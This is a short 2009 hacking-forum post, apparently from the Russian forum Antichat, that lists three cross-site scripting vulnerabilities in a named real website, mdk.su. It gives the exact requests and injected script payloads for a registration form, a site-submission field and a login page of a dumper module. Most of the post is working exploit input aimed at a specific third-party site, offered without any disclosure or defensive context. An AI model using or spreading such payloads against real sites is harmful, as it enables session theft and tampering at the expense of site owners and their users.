11.01.2009, 19:28
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
XSS ( POST запрос)
http://mdk.su/index.php?user_name=&user_email=asdasd%40asdasd.ru %27%3E%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E &user_password=&user_password2=&check=&op=finnewus er
-------------
XSS ( POST запрос)
http://mdk.su/index.php?name=sites&op=add
Уязвимо поле Ссылка. В своем профиле ( Мои сайты) - активная (подозреваю, что и на апруве тоже)
* '>"><img src=. onerror=evil_script>
--------------
XSS ( POST запрос)
http://mdk.su/modules/dumper/index.php?login='>"><script>alert()</script>&pass=asd
Последний раз редактировалось BlackSun; 11.01.2009 в 20:03..
|
|
|